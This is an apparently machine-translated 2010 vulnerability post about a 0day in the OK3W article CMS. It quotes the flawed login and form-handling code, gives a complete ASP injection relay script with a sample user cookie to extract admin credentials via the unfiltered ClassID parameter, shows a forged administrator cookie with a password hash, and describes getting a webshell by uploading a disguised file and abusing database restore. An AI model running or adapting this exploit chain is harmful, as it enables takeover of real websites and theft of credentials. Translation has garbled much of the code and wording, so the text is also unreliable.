OK3W article management system vulnerability 0day-vulnerability warning-the black bar safety net

ID MYHACK58:62201026923
Type myhack58
Reporter 佚名
Modified 2010-05-14T00:00:00


OK3W is a set of articles management system, the entire system of the program structure is based on a custom class to achieve, very creative o(∩_∩)o...security is still relatively good, the current free version 4. 7 The existence of this vulnerability, the official website may also exist, but don't know the patch yet, last time passing by to be found the background verification process Public Function AdminIsLogin() If Trim(AdminName) = "" Then AdminIsLogin = 0’No login Else If AdminLogin(AdminName,AdminPwd,"IsCheck")<>-1 Then AdminIsLogin = 0’Cookies error Else AdminIsLogin = -1’has landed End If End If End Function Public Function AdminLogin(sAdminName,sAdminPwd,sType) AdminName = sAdminName Sql = "select * from Ok3w_Admin where AdminName=? and AdminPwd=?" Set AdminCmd = Server. CreateObject("Adodb. Command") AdminCmd. ActiveConnection = Conn AdminCmd. CommandType = 1 AdminCmd. CommandText = Sql AdminCmd. Parameters. Append(AdminCmd. CreateParameter("@AdminName",2 0 0,1,5 0,sAdminName)) AdminCmd. Parameters. Append(AdminCmd. CreateParameter("@AdminPwd",2 0 0,1,5 0,sAdminPwd)) Set AdminRs = Server. CreateObject("Adodb. RecordSet") Set AdminRs = AdminCmd. Execute the response. write sAdminName&" "&amp; sAdminPwd&" with" response. write AdminCmd. CommandText Set AdminCmd = Nothing If AdminRs. Eof And AdminRs. Bof Then AdminLogin = 1’The user name or password is incorrect Else If AdminRs("AdminLock") Then AdminLogin = 2’The user is locked Else the Response. Cookies("Ok3w")("AdminId") = AdminRs("AdminId") Response. Cookies("Ok3w")("AdminName") = AdminRs("AdminName") Response. Cookies("Ok3w")("AdminPwd") = AdminRs("AdminPwd") Response. Cookies("Ok3w")("GroupId") = AdminRs("GroupId") If sType="IsLogin" Then Call AdminActionLog("successful login") AdminLogin = -1’successful login End If End If AdminRs. Close Set AdminRs = Nothing response. write adminlogin End Function

I see where thought can be really laborious win, the base through the gateway, where the login authentication, although the use of cookies for authentication, but the sql statement is pre-compiled manner to the query, so the single quotes here is useless, can't use universal password. (Thanks ninty big cow pointing)

So we can only inject get to the password. Look at his encrypted manner, the encryption a md5(3 2), Take the first 1 to 6 characters 1 to 6 characters, respectively, the encrypted md5(1 6), and then merge like this, anyway, is not out) Can only get to the password ciphertext and username cookies deceived Vulnerability file: user_index. asp Invokes the article class in The following piece of code Private Sub GetFormData() Id = Request. QueryString("Id") If Id = "" Then Id=GetMaxArticleID()+1 ChannelID = Request. QueryString("ChannelID") ClassID = Request. Form("ClassID") If ClassID="" Then ClassID = -1 SortPath = "" Else SortPath = Conn. Execute("select SortPath from Ok3w_Class where ID=" & ClassID)(0) ’ there's no filtering classid End If Title = Request. Form("Title") TitleColor = Request. Form("TitleColor") TitleURL = Request. Form("TitleURL") Keywords = Request. Form("Keywords") Description = Request. Form("Description") For i = 1 To Request. Form("Content"). Count ContentContent = Content & Request. Form("Content")(i) Next If Request. Form("eWebEditorUpFile") = "1" Then ePATH_INFO = Request. ServerVariables("PATH_INFO") eTmp = Split(ePATH_INFO,"/") ePATH_INFO = "" For ee=0 To Ubound(eTmp)-2 ePATH_INFOePATH_INFO = ePATH_INFO + eTmp(ee) + "/" Next Content = Replace(Content,"../upfiles/","upfiles/") Content = Replace(Content,"../editor/","editor/") Content = Replace(Content,ePATH_INFO & "upfiles/","upfiles/") Content = Replace(Content,ePATH_INFO & "editor/","editor/") End If Author = Request. Form("Author") ComeFrom = Request. Form("ComeFrom") AddTime = Request. Form("AddTime") Inputer = Request. Form("Inputer") If Inputer="" Then Inputer = Admin. AdminName IsPass = Request. Form("IsPass") If IsPass = "" Then IsPass = 0 IsPic = Request. Form("IsPic") If IsPic = "" Then IsPic = 0 PicFile = Request. Form("PicFile") IsTop = Request. Form("IsTop") If IsTop = "" Then IsTop = 0 IsCommend = Request. Form("IsCommend") If IsCommend = "" Then IsCommend = 0 IsDelete = Request. Form("IsDelete") If IsDelete = "" Then IsDelete = 0 IsMove = Request. Form("IsMove") If IsMove = "" Then IsMove = 0 IsPlay = Request. Form("IsPlay") If IsPlay = "" Then IsPlay = 0 IsIndexImg = Request. Form("IsIndexImg") If IsIndexImg = "" Then IsIndexImg = 0 IsUserAdd = Request. Form("IsUserAdd") If IsUserAdd = "" Then IsUserAdd = 0 GiveJifen = Request. Form("GiveJifen") If GiveJifen = "" Then GiveJifen = 0 vUserGroupID = Request. Form("vUserGroupID") If vUserGroupID = "" Then vUserGroupID = 0 vUserMore = Request. Form("vUserMore") If vUserMore = "" Then vUserMore = 0 vUserJifen = Request. Form("vUserJifen") If vUserJifen = "" Then vUserJifen = 0 pMoodStr = Request. Form("pMoodStr") If pMoodStr = "" Then pMoodStr = "0,0,0,0,0,0,0,0"Hits = Request. Form("Hits") End Sub

But if don't know then which files to call in and put the classid to the cint off, so the experiment found that

id=1 and 1=1 error: type mismatch id=1 and 1=2, error message is: unable to find a result set

Only according to the error message to the injection, that is, to be injected must be an error, the server blocked error information of the Can't injected.

Injection process: To register a user, login, get the cookies

<% JmdcwName=request("jmdcw") ’ injected into the transfer station POST version,BY the lonely hedgehog [L. S. T] JmStr="Title=1 1 1&Content=1 1 1 1 1 1&UpFiles=&ComeFrom=%CE%D2%B5%C4%CD%F8%D5%BE&Author=%CE%D2%B5%C4%CD%F8%D5%BE&ClassID="&amp; JmdcwName JMUrl="http://www.hackqing.cn/User_Index.asp?a=a_edit&b=save& a_id=2 8" ’put the localhost to the URL of your web site JmRef="http://www.hackqing.cn/6kbbs/bank.asp" JmCok="Ok3w=User%5FPassword=ed64d3bd1ad013789c2e6ee373a96d8b&User%5FName=gogolrq" ’put here into your cookies JmCok=replace(JmCok,chr(3 2),"%2 0") JmStr=URLEncoding(JmStr) response. write PostData(JMUrl,JmStr,JmCok,JmRef) Function PostData(PostUrl,PostStr,PostCok,PostRef) Dim Http Set Http = Server. CreateObject("msxml2. serverXMLHTTP") With Http . Open "POST",PostUrl,False . SetRequestHeader "Content-Length",Len(PostStr) . SetRequestHeader "Content-Type","application/x-www-form-urlencoded" . SetRequestHeader "Referer",PostRef . SetRequestHeader "Cookie",PostCok . Send PostStr PostData = . ResponseBody End With Set Http = Nothing PostData =bytes2BSTR(PostData) End Function Function bytes2BSTR(vIn) Dim strReturn Dim I, ThisCharCode, NextCharCode strReturn = "" For I = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn, I, 1)) If ThisCharCode < &H80 Then strReturnstrReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn, I + 1, 1)) strReturnstrReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) II = I + 1 End If Next bytes2BSTR = strReturn End Function Function URLEncoding(vstrin) strReturn="" Dim i For i=1 To Len(vstrin) ThisChr=Mid(vstrin,i,1) if Abs(Asc(ThisChr))< &HFF Then strReturnstrReturn=strReturn & ThisChr Else InnerCode=Asc(ThisChr) If InnerCode<0 Then InnerCodeInnerCode=InnerCode + &H10000 End If Hight1=(InnerCode And &HFF00) &HFF Low1=InnerCode And &HFF strReturnstrReturn=strReturn & "% "& Hex(Hight1) & "%" & Hex(Low1) End if Next strReturn=Replace(strReturn,chr(3 2),"%2 0") ’conversion space,if the site filtered spaces,try to use/**/instead%2 0 strReturn=Replace(strReturn,chr(4 3),"%2B") ’JMDCW increase the conversion+character ’strReturn=Replace(strReturn,filtered characters,"convert to character") ’this increase to filter the code URLEncoding=strReturn End Function %>

To modify the finished, injected into the url address/jmdcw. asp? jmdcw=1 2 3 or 1=1

The table name is ok3w_admin Field adminname,adminpwd Get the account number and password after Forged cookies Ok3w=AdminPwd=be4b3b08e33d66fc8b2759a05bf4e10e&AdminName=admin&GroupId=%2C1%2C2%2C3%2C4%2C5%2C6%2C&AdminId=1 6 The adminpwd back into a ciphertext adminname behind the changed user name Forged cookies Access http://www.hackqing.cn/admin/sys_admin.asp you can add a new administrator ---------------------------------------------------------------------------------------------------------- Into the background The database is generally the asp format, there is notdown table Upload vulnerabilities Backup features: Is backup the original file can only be the original database, cannot be changed, the change is useless Restore function: After reduction of the path cannot change, change the useless, where you can get the database address of the Use: First the original database backup, Upload a gif horse, using the Restore feature, restore the source database for the address of the General of the asp, not the asp would stand a chance, and get the shell This time the website will can not access, after entering please take a backup of the database restore